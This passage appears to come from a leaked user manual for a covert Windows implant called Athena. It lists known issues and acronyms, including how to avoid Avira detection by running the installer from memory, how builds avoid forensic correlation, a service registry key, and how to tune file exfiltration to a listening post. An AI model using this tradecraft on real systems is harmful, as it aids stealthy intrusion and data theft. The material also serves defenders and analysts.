fail, causing the command to be reported as an error.

10.2 (U) Installer and RAM_ONLY Versions Should Never Be Run From Disk
(S//NF) Copying the Installer or the RAM_ONLY version of the implant to the target computer
and then executing either application from disk will generate an alert when Avira is the PSP.
Avira flags the size of the data section as being too large and thus possibly malware. Avira does
not flag the size of the implant data section when these applications are run from memory as
intended.

10.3 (U) Builder Does Not Produce a "Bit Copy" of an Existing Configured Implant
(S//NF) The Builder can ingest a configuration file from an existing implant and copy the
configuration settings to a new implant. However, the new implant will not be a bit-for-bit copy
of the original. An exact copy is not possible by design: the implant is built to ensure entropy
between instances of the tool. The only way to reproduce a bit copy of an existing implant would
be to have a large section of zero bytes in the configured implant, which would be an easy way to
correlate instances of the tool.

10.4 (U) Offline Installer May Report a False Failure on Windows 10 Installations
(S//NF) The Offline Installer may display an error message stating the following key is not
found:
Reg: SYSTEM\CurrentControlSet\Services\SstpSvc
Start -> 0x02
Type -> 0x20

(U) If the result of the installation process is a SUCCESS, the Key Not Found error should be
ignored.

10.5 (S//NF) Timeouts May Occur While Processing Large Files
(S//NF) If the Operator selects a very small chunk size (e.g., 2048 bytes) and a short duration for
either the command execution or batch execution timeout, the implant may not have enough time
to transfer a very large file to the LP before the timer expires. Care should be taken to select
values consistent with the operational environment when configuring the chunk size (maximum
number of bytes in a single block), command execution timeout (terminates processing of long
running commands), and batch execution timeout (terminates processing of long running
batches). A good operational practice is to set reasonable values for these settings early in the
batch in which a large file is being retrieved.

11. (U) Acronyms / Abbreviations
(U) The acronyms and abbreviations used in this document are shown in Table 11.
Table 11 - (U) Acronyms and Abbreviations
Acronym | Description
AXE     | Athena Executable File
CNE     | Computer Network Exploitation
CONOP   | Concept of Operation
DLL     | Dynamic Link Library
DNS     | Domain Name System
GB      | Gigabyte
KB      | Kilobyte
KIS     | Kaspersky Internet Security
LP      | Listening Post
OS      | Operating System
PE      | Portable Executable
PSP     | Personal Security Product
RAM     | Random Access Memory
SSL     | Secure Sockets Layer
UI      | User Interface
UM      | User Manual
VM      | Virtual Machine
